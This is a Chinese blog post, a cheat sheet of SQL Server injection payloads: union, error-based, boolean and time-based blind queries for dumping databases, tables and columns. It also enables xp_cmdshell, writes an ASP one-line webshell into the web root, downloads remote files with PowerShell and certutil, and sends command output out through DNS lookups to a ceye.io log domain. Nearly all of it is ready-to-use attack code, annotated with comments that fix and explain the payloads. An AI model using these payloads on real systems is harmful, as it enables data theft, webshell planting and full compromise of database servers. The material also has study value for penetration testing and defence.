
SQLserver注入大全

作者: 泽英君 | 来源:发表于2019-07-17 09:18 被阅读5次

联合查询注入

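-- Union-based injection. First find the column count of the original query
-- (raise the number until ORDER BY errors), then pad the UNION SELECT with
-- NULLs to that count; NULL is compatible with every column type.
order by 4--

-- Database names.
union select name,null,null,null from master..sysdatabases--  // list database names

-- One name per request: put every name already seen into NOT IN and take the next one.
union select top 1 name,null,null,null from master..sysdatabases where name not in('master','flag')-- // fetch the remaining names one at a time

-- User tables of database "test" (xtype 'U' = user table; the lowercase 'u'
-- only matches under a case-insensitive collation).
union select name,null,null,null from test..sysobjects where xtype='u'--  // list table names

-- Columns of one table. syscolumns.xtype is the column's DATA TYPE id
-- (239 = nchar), so the original filter xtype='239' returned every nchar
-- column in the database instead of the columns of the target table.
-- Filter on the owning object's id instead, the same form the error-based
-- section below uses for syscolumns.
union select name,null,null,null from test..syscolumns where id=(select id from test..sysobjects where name='[表名]')--  // list column names of [表名]

-- Dump values once table and column names are known.
union select [字段名],null,null,null from [数据库名]..[表名]--  // read data

-- information_schema / sys.* equivalents (SQL Server 2005+): one column name per request.
union select top 1 COLUMN_NAME,null,null,null from [数据库名].information_schema.columns where TABLE_NAME='[表名]'--

-- User objects only: is_ms_shipped=0 drops the system-supplied ones.
union select top 1 name,null,null,null from [数据库名].sys.all_objects where type='U' AND is_ms_shipped=0 --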

报错注入

1、判断数据库类型

-- Fingerprinting: sysobjects exists on SQL Server (and Sybase). If the page
-- still renders normally with this appended, the backend is most likely
-- SQL Server; another engine raises an error on the unknown table.
and exists (select * from sysobjects)--

and exists (select count(*) from sysobjects)--

2、判断数据库版本

-- Version: comparing the nvarchar @@version with the int 1 forces an implicit
-- conversion of the string to int, which fails, and the error message echoes
-- the version string.
and 1=@@version--  // when error messages are displayed

-- Blind variant: "Microsoft SQL Server " is 21 characters, so the release year
-- starts at offset 22 (substring is 1-based); test one candidate per request.
and substring((select @@version),22,4)='2008'--  // for blind injection, no error output

-- Explicit form of the conversion-error trick. No trailing "--" here, so the
-- rest of the original query is still evaluated.
and 1=convert(int,(@@version))

-- Same trick on user, the current database user name (not the login).
and 1=convert(int,(user))--  // current database user

3、获取数据库个数(dbid从1-4的数据库一般为系统数据库)

-- Database count via the same int-conversion error: quotename()/str() and the
-- '|' or char(1) suffixes turn the numeric count into a string that cannot be
-- converted back to int, so the error message shows it.
and 1=(select quotename(count(name)) from master..sysdatabases)--

-- %2b is a URL-encoded '+' (T-SQL string concatenation).
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --

and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>0) --

and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where  dbid>0) --

4、获取全部数据库名称(版本>=2005)

-- All database names in one error: FOR XML PATH('') (SQL Server 2005+) folds
-- the rows into a single string, which then fails the int comparison.
-- quotename() / '|' delimit the individual names inside that string.
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

-- Same, with an explicit convert.
and 1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH('')))-- all database names

5、获取当前数据库名称

-- Current database name through the nvarchar-to-int conversion error. The
-- first and last forms have no trailing "--", so the remainder of the
-- original query still runs.
and db_name()>0

and 1=(select db_name())--

and 1=convert(int,(db_name()))

6、获取全部表名(版本>=2005)

-- All user-table names of [数据库名] in one error (FOR XML PATH, 2005+).
and 1=(select quotename(name) from [数据库名]..sysobjects where xtype='U' FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from [数据库名]..sysobjects where xtype='U' FOR XML PATH(''))--

-- One table per request through information_schema: add each name found to
-- the NOT IN list and repeat until the query stops erroring.
and 1=convert(int,(select top 1 table_name from [数据库名].information_schema.tables where table_name not in ('[第一个表名]')))--

7、获取全部列名(版本>=2005)

-- All column names of [指定表名]: syscolumns.id is the owning object's id, so
-- resolve it through sysobjects.name. The inner subquery must yield one row;
-- if the same table name exists in several schemas it raises a different
-- error (subquery returned more than one value) instead of leaking names.
and 1=(select quotename(name) from [数据库名]..syscolumns where id =(select id from [数据库名]..sysobjects where name='[指定表名]') FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from [数据库名]..syscolumns where id =(select id from [数据库名]..sysobjects where name='[指定表名]') FOR XML PATH(''))--

8、获取数据

and 1=(select top 1 name from [数据库名]..[表名] where name not in ('xxx'))--

9、爆列名

-- HAVING without GROUP BY makes SQL Server reject the first selected column
-- ("is invalid in the select list because it is not contained in either an
-- aggregate function or the GROUP BY clause"), and the error names it as
-- table.column.
having 1=1--

-- Add each revealed column to GROUP BY and the error names the next one.
group by [第一个列名],[第二个列名] having 1=1--

盲注

1、Ascii

and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)) >= 109--

2、时间盲注

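-- Time-based blind injection. The T-SQL keyword is the single token WAITFOR
-- (WAITFOR DELAY 'h:m:s'); the original "wait for delay" is a syntax error,
-- never pauses, and therefore reports a false "not vulnerable". The leading
-- ';' makes these stacked queries, which the application's driver must allow.
;WAITFOR DELAY '0:0:5'--

-- Conditional delay: pause only when the predicate holds. system_user is the
-- login name; 'root' is a MySQL convention, the SQL Server built-in admin
-- login is 'sa' — substitute whatever login you are probing for.
;if system_user='root' WAITFOR DELAY '0:0:5'--

-- Does the current login hold the sysadmin server role (needed for
-- sp_configure / xp_cmdshell later on)?
;if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:5';--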

3、DNSlog

-- DNS exfiltration: xp_dirtree is handed a UNC path whose host part embeds the
-- value, so the server resolves <value>.xxx.ceye.io and the DNS log records it.
-- Replace xxx.ceye.io with a log domain you control. Caveats: the server also
-- attempts an SMB connection to that host (outbound 445 may be blocked, and it
-- will send an NTLM challenge-response); the value must form a valid DNS label
-- (no spaces, 63 characters max); char(128) pads @a with trailing spaces —
-- NOTE(review): a varchar would avoid that, confirm whether the padding breaks
-- the lookup on your target.
;declare @a char(128);set @a='\\'%2buser%2b'.xxx.ceye.io\abc';exec master..xp_dirtree @a;--  // database user name

;declare @a char(128);set @a='\\'%2b(select top 1 name from master.dbo.sysdatabases)%2b'.xxx.ceye.io\abc';exec master..xp_dirtree @a;-- // first database name (TOP 1 without ORDER BY is arbitrary)

4、基于xp_cmdshell获取webshell

-- Are web server and database on the same host? host_name() is the name of
-- the client machine the application connects from, @@servername the SQL
-- Server instance name; equal means the same box. NOTE(review): @@servername
-- is "HOST\INSTANCE" for named instances, so this can wrongly report
-- "separate" — serverproperty('MachineName') is the safer comparison.
;if(host_name()=@@servername) WAITFOR DELAY '0:0:5';--  // delay means web and DB share a host

-- Is the xp_cmdshell extended procedure still registered? (xtype 'X' =
-- extended stored procedure; lowercase 'x' relies on a case-insensitive collation)
;if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:2'--  // check whether xp_cmdshell exists

-- Re-register it if it was dropped. sp_addextendedproc with xplog70.dll is the
-- method usually documented for SQL Server 2000; on 2005+ xp_cmdshell is
-- normally disabled via sp_configure rather than dropped, so use the next line.
;exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'--  // restore xp_cmdshell

-- Enable xp_cmdshell (2005+). sp_configure needs ALTER SETTINGS (sysadmin /
-- serveradmin); RECONFIGURE applies the change. This is a server-wide,
-- logged configuration change — set it back to 0 when finished.
;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--  // enable xp_cmdshell

-- Capture command output in a table when there is no direct echo. tempdb is
-- recreated on every restart, so the table disappears then; drop it yourself
-- when done rather than leaving artifacts behind.
;use tempdb;create table tt_tmp (tmp1 varchar(1000));--  // create table tt_tmp in tempdb

;use tempdb;insert into tt_tmp(tmp1) exec master..xp_cmdshell 'dir /s /b d:\1.txt';--  // locate a file and store the matching paths in tt_tmp

5、写入一句话

;exec master..xp_cmdshell 'echo ^<script language=vbs runat=server^>eval(request("c"))^</script^> > c:\\inetpub\\wwwroot\\shell.asp';--

6、远程下载

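-- Remote download via xp_cmdshell. The PowerShell command is embedded in a
-- single-quoted T-SQL literal, so the single quotes around the URL and the
-- destination path must be doubled ('' -> ') — the original closed the T-SQL
-- literal at the first inner quote and did not parse. Replace http://ip with
-- the real URL.
;exec master..xp_cmdshell 'powershell -exec bypass -c (new-object  System.Net.WebClient).DownloadFile(''http://ip'',''E:\test.php'')';--

-- certutil alternative when PowerShell is unavailable: -f fetches the URL,
-- -split writes the body to the destination file. -urlcache may leave an
-- entry in certutil's URL cache — clear it (certutil -urlcache <url> delete)
-- if you need to limit artifacts.
;exec master..xp_cmdshell 'certutil -urlcache -split -f http://ip/1.txt E:/test.php';--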

7、使用DNSlog执行命令并查看回显（回显经base64编码后通过DNS查询外带；base64中的+、/、=不是合法的DNS字符，且set /p只读取文件的第一行，因此结果可能乱码或不完整）

;exec master..xp_cmdshell "whoami>c:\temp%26%26certutil -encode c:\temp c:\temp2%26%26findstr /L /V ""CERTIFICATE"" c:\temp2>c:\temp3";exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< c:\temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";exec master..xp_cmdshell "del ""c:\temp"" ""c:\temp2"" ""c:\temp3""";--


